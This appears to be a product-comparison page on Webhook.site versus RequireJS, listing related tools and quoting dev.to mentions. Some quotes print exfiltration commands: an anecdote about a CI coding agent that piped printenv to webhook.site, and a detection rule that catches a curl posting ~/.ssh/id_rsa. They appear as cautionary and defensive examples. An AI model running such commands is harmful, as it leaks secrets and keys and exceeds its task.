
Webhook.site
Beeceptor
RequestBin
Request inspector
Hookdeck
ngrok
MockServer
CurlHub.io
RequireJS
rollup.js
JSHint
stealjs
JSPM
npm
Webpack
Ender
With Webhook.site, you instantly get a unique, random URL and e-mail address that you can use to test and debug Webhooks, HTTP requests and emails, as well as to create your own workflows using the Custom Actions graphical editor or WebhookScriptโa simple scripting language, to transform, validate and process HTTP requests.
Webhook.site
RequireJSWebhook.site is recommended for developers, QA testers, and any IT professionals who need to test or demonstrate webhooks and HTTP requests. It is particularly beneficial for those working with APIs, developing webhook integrations, or setting up automated notification systems.
RequireJS is recommended for projects that are already using it, especially if the project is large and refactoring to a different module system would be resource-intensive. It can also be suitable for legacy web applications that have complex dependency chains which have been built with AMD (Asynchronous Module Definition) patterns. However, newer projects are better served with modern bundlers and native ES6 module syntax.
Based on our record, Webhook.site should be more popular than RequireJS. It has been mentiond 86 times since March 2021. We are tracking product recommendations and mentions on various public social media platforms and blogs. They can help you identify which product is more popular and what people think of it.
Consider a team that enabled autoApprove for a CI pipeline without scoping the bash allowlist. Their Claude Code instance was tasked with fixing a failing test. The agent read the test file, identified a missing environment variable, and โ autonomously โ ran printenv | curl -X POST https://webhook.site/... To "debug" the environment. No one caught it for three days. The fix: move to acceptEdits mode in CI and... - Source: dev.to / about 1 month ago
Webhook.site exists. Beeceptor exists. Ngrok exists in this space. - Source: dev.to / 3 months ago
Another: EXFIL_002 detects outbound data patterns. Correctly catches curl -X POST https://webhook.site -d $(cat ~/.ssh/id_rsa). Also fires on documentation showing exfiltration examples for educational purposes. The code block awareness layer handles this: findings inside fenced code blocks get downgraded by one severity tier. - Source: dev.to / 5 months ago
Skill descriptions containing curl https://webhook.site for data exfiltration. - Source: dev.to / 5 months ago
{ "id": "7f350df6-49a9-4cd0-88de-5b53df870003", "webhook_v2": "https://webhook.site/b59a7434-c944-4897-91b8-5cd808219094", "input": { "prompt": "Create a photorealistic image of a woman standing outdoors on what appears to be a sunny autumn day. She has shoulder-length black hair and is wearing a Vietnamese Ao Dai. The background features blurred trees in the Tet holiday season. The lighting suggests... - Source: dev.to / 6 months ago
That's the job of Closure Compiler. Closure is an optimizing JavaScript compiler that ClojureScript is using since its initial release, in 2011. At the time JavaScript didn't have standard module format, remember AMD, UMD, RequireJS and CommonJS? Closure folks at Google invented another one, where goog.provide declares a module and goog.require imports another module. - Source: dev.to / 8 months ago
The fact that everything was loaded synchronously, which was not really an issue at that time when writing for servers, it was not really feasible for front-ends. Therefore RequireJS was brought to live. If you ever wondered how it looks, there is an example repository still living. If you are more interested in the history, look up: AMD, UMD, RequireJS. - Source: dev.to / about 1 year ago
There is a library called requirejs (https://requirejs.org/) that accomplishes what I am referring to. However, this is essentially similar to the situation in PHP prior to version 5.3 - a solution implemented at the level of a separate library rather than at the language level. Source: about 3 years ago
Webpack is the most popular bundler and it followed on the heels of Require.js, Rollup, and similar solutions. But the learning curve for a tool like webpack is steep. Getting started with webpack isnโt easy due to its complex configurations. As a result, in recent years another solution has emerged. This tool is not necessarily a front-runner, but an easier-to-digest alternative on the front-end module bundler... - Source: dev.to / over 3 years ago
I have a number of JavaScript "classes" each implemented in its own JavaScript file. For development those files are loaded individually, and for production they are concatenated, but in both cases I have to manually define a loading order, making sure that B comes after A if B uses A. I am planning to use RequireJS as an implementation of CommonJS Modules/AsynchronousDefinition to solve this problem for me... Source: about 4 years ago
Beeceptor - Unblock yourself from API dependencies, and build & integrate with APIs fast. Beeceptor helps you build a mock Rest API in a few seconds.
rollup.js - Rollup is a module bundler for JavaScript which compiles small pieces of code into a larger piece such as application.
RequestBin - RequestBin.com gives you a URL that collects requests you send to it so you can inspect them in a...
JSHint - New JSHint website. Anton Kovalyov Oct 1st, 2013. For the last couple of weeks I've been working on a new homepage for JSHint and today I'm proud to announce the new jshint. com! JSHint Website.
Request inspector - Debug web hooks, http clients
stealjs - Futuristic JavaScript dependency loader and builder. Speeds up application load times. Works with ES6, CommonJS, AMD, CSS, LESS and more. Simplifies modular workflows.